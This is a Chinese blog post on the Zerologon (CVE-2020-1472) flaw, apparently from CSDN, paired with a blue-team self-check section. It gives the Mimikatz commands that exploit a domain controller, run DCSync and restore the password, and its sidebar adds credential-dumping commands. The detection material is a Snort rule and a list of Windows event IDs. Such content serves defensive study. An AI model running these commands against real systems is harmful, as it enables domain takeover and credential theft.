域控服务器排查命令,Mimikatz利用Zerologon攻击域控服务器相关命令(附蓝队自查方案)...

最新推荐文章于 2024-05-27 09:14:56 发布
最新推荐文章于 2024-05-27 09:14:56 发布
阅读量706 收藏
点赞数
文章标签: 域控服务器排查命令

0x01 前言

mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix

官方利用截图如下

df63505dae41ca0e4df172657c6bc536.png

mimikatz相关命令lsadump::zerologon /target:dc.hacke.testlab /account:dc$  poc

lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit  通过zerologon`漏洞攻击域控服务器

lsadump::dcsync

lsadump::postzerologon /target:conttosson.locl /account:dc$ #   恢复密码

8127d4c115f530eb65938e40b6783557.png

snort 检测规则alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)

pcap包

windows事件管理器自查

在未打补丁的域控,重点查看windows事件管理器中,eventid为4742或者4624

在windows 8月更新中,新增事件ID 5829,5827,5828,5830,5831。蓝队可以重点关注这几个事件ID以方便自查当在初始部署阶段允许存在漏洞的Netlogon安全通道连接时,将生成事件ID 5829。

管理员可以监控事件ID 5827和5828,这些事件ID在存在漏洞的Netlogon连接被拒绝时触发

5830,5831  如果“域控制器:允许易受攻击的Netlogon安全通道连接”组策略允许连接。

mimikatz通过zerologon攻击成功后,将会留下事件id为4648。

参考

weixin_39590989
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ZeroLogon (CVE-2020-1472) 漏洞利用
Captain_RB的博客
10-24 1万+
ZeroLogon (CVE-2020-1472) 是近几年Windows上曝出的高危漏洞,CVSS V3.0评分10.0,攻击者只需要定位域控主机名及IP,并且可以访问域控,就可以在无需任何凭据的情况下 (可在域外) 拿到域管理员的权限。
ZeroLogon(CVE-2020-1472) 漏洞的攻击与防御策略(上)
systemino的博客
10-27 3717
本文将从攻防角度对CVE-2020-1472进行一个简单的介绍,并对如何检测和修复ZeroLogon提出具体建议。 什么是ZeroLogon? Netlogon远程协议(也称为MS-NRPC)是一个远程进程调用(RPC)接口,仅由连接到域的设备使用。 MS-NRPC包括身份验证方法和建立Netlogon安全通道的方法。这些更新强制指定的Netlogon客户端行为,以便在成员计算机和Active Directory (AD)域控制器(DC)之间使用带有Netlogon安全通道的安全RPC。 Zero..
域提权漏洞系列分析-Zerologon漏洞分析
最新发布
hakksjss的博客
05-27 817
3.利⽤置零修改域控密码为空,这⼀步会把域控win-3o8g1o8vv2e(即win-3o8g1o8vv2e$⽤户)的密码置为空, hash为31d6cfe0d16ae931b73c59d7e0c089c0,回显两个OK显示成功把密码置零(如图6- 所示),因为机器⽤ 户是不可以登录系统的,但是域控的机器⽤户具备Dcsync特权,我们就可以滥⽤该特权来进⾏Dcsync攻击;图6- 获取域控服务器的机器账号。图6- 利⽤置零修改域控密码为空。图6- 探测域控是否存在该漏洞。
域控服务器排查命令,mimikatz利用zerologon攻击域控服务器相关命令附蓝队自查方案)...
weixin_32019361的博客
08-02 662
0x01 前言mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix官方利用截图如下 mimikatz相关命令lsadump::zerologon /target:dc.hacke.testlab /account:d...
内网渗透:八、CVE-2020-1472 NetLogon 域内提权漏洞(域控密码置空)
liu_jia_liang的博客
03-08 5185
简介: 2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。 Netlogon远程协议是一个可用的在Windows域控制器上的RPC(remote pr...
域森林中置零攻击(总)
技术超强的网络安全平台
12-06 84
系列文章专辑:渗透测试之地基篇简介渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!一、前言渗透测试人员需谨记《网络安全法》,根据《
ZeroLogon(CVE-2020-1472) 漏洞的攻击与防御策略(下)
systemino的博客
10-11 1221
上文我们介绍了攻击原理,本文我们将详细介绍可以发起的攻击种类和防御措施。 攻击种类 计算机/设备帐户本质上与用户帐户相同,如果配置错误,可能同样危险。因此,可以利用计算机帐户密码/哈希值进行一些其他攻击: 1.银票攻击; 2.金票攻击; 3.过时的DNS条目; 4.攻击的替代方法。 金票和银票攻击通过利用Kerberos票据授予服务(TGS)来伪造票据。金票和银票攻击的主要区别在于银票只允许攻击者伪造特定服务的TGS票。这两者都可以被利用,因为Zerologon允许攻击者更改计算机帐户密码..
Invoke-Mimikatz.ps1
01-06
Invoke-Mimikatz.ps1
测试工具mimikatz-windows版64位,32位。查看.dmp文件工具
06-05
需要以管理员身份运行的命令行,进入mimikatz.exe文件夹下,运行mimikatz.exe,(*需要测试的文件,需要和mimikatz.exe放在同一文件夹下) Mimikatz命令: **提升权限 命令:privilege::debug ** cls: 清屏 ...
mimikatz.zip附简单使用方法
08-01
mimikatz的使用需要administrator用户执行,administrators中的其他用户都不行。 注意该程序会被ban 提升权限 privilege::debug 抓取密码 sekurlsa::logonpasswords reg add HKLM\SYSTEM\CurrentControlSet\Control...
mimikatz.exe
09-28
获取windows密码
mimikatz.rar
07-08
同时,这一特性也使得mimikatz成为了一种潜在的安全威胁,因为恶意用户可以利用它窃取敏感信息。 除了密码获取,mimikatz还提供了多种其他功能。例如,它可以读取SAM(Security Account Manager)数据库,获取系统...
看我拿下域控利用mimikatz打cve2020-1472
weixin_43227251的博客
04-13 1155
利用mimikatz利用cve2020-1472 原理在上一节说了,本章不多提,主要介绍mimikatz利用方式 检测目标机是否存在cve2020-1472 lsadump::zerologon /target:域控IP /account:域控主机名$ lsadump::zerologon /target:192.168.18.20 /account:WIN-H06K3JJM9AO$ 清空域控密码 lsadump::zerologon /target:域控IP /account:域控主机名$
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9210
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
Pentest - Mimikatz
Nixawk
09-12 7239
Active Directory supports two primary authentication protoc ols, NTLM and Kerberos. Modern Windows versions default to Kerberos authentication. NTLM suffers from two main weaknesses: 1) the NTLM pass
mimikatz读取用户密码
热门推荐
weixin_40709439的博客
09-26 1万+
当我们getshell之后,一般是提权拿下远程服务器,刚学习了一个直接读取远程服务器的密码的工具mimikatz 首先先利用 privilege::debug 提生权限  sekurlsa::logonPasswords就是抓取密码 这是我本机的,空密码   另外当无法上传mimikatz工具到目标服务器时,可以利用procdump把lsass进程的内存文件导出本地,再在本地利用...
MIMIKATZ编译教程
痴人说梦梦中人
01-25 1733
一、Visual Studio Community安装 下载地址:https://visualstudio.microsoft.com/zh-hant/vs/community/ 下载是真的慢,要等好一会儿。 二、
mimikatz.exe2.2
12-15
Mimikatz.exe 2.2可以在本地或远程访问的Windows系统上运行,并且可以通过多种方式进行执行,使得攻击者可以轻而易举地获取到系统中的敏感信息。这些信息包括但不限于用户名、密码、凭据、密钥等,对系统安全构成了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值